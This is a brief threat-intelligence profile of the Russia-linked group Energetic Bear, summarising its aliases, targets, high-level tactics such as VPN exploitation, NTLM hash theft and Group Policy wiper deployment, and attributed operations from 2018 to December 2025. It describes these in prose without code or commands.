Cyber Threat Actor: Energetic Bear

EnergeticBear, also known as Dragonfly or DragonFly, is a threat actor that has been publicly linked to Russia and is described as a state‑sponsored group. The actor’s known aliases appear in multiple security reports and are consistently associated with operations originating from Russian infrastructure. Public attributions identify the group as working on behalf of the Russian state, particularly in campaigns that target critical infrastructure and aviation sectors. The actor’s strategic objectives, as evidenced by observed activities, include both espionage through credential harvesting and disruption via destructive wiper malware. Targeting has historically focused on energy sector organizations, with later expansions into aviation, manufacturing, and broader critical infrastructure in Europe and North America.

The group’s tactics, techniques, and procedures reveal a pattern of exploiting internet‑exposed virtual private network devices that lack multi‑factor authentication, such as FortiGate VPN appliances, to gain initial access. Once inside a network, the actor establishes persistence by altering device settings and uses lateral movement techniques, including the abuse of SMB features and file:// prefixes to collect NTLM hashes for credential theft. The actor frequently employs PowerShell‑based tools and leverages Group Policy Objects to deploy malicious payloads across compromised environments. Observed malware families include custom wipers such as LazyWiper and DynoWiper, which are designed to overwrite or destroy data, as well as scripts that harvest Windows credentials through Internet Explorer vulnerabilities. These tooling choices reflect a focus on stealthy persistence, credential access, and destructive impact when desired.

Representative operations attributed to Energetic Bear include the March 2020 compromise of two San Francisco International Airport websites, where an Internet Explorer exploit was used to steal NTLM hashes from visitors’ Windows credentials. In July 2018, the actor was reported to have infiltrated U.S. utility control rooms, gaining unauthorized access to operational technology networks without causing immediate disruption. More recently, in December 2025, the group conducted coordinated attacks against Poland’s critical infrastructure, exploiting exposed FortiGate VPN devices to reach manufacturing, heat and power, and renewable energy facilities, subsequently deploying PowerShell wipers via Group Policy to destroy data. These incidents illustrate the actor’s recurring use of VPN exploitation, credential harvesting, and wiper deployment across different geographic and sectoral targets.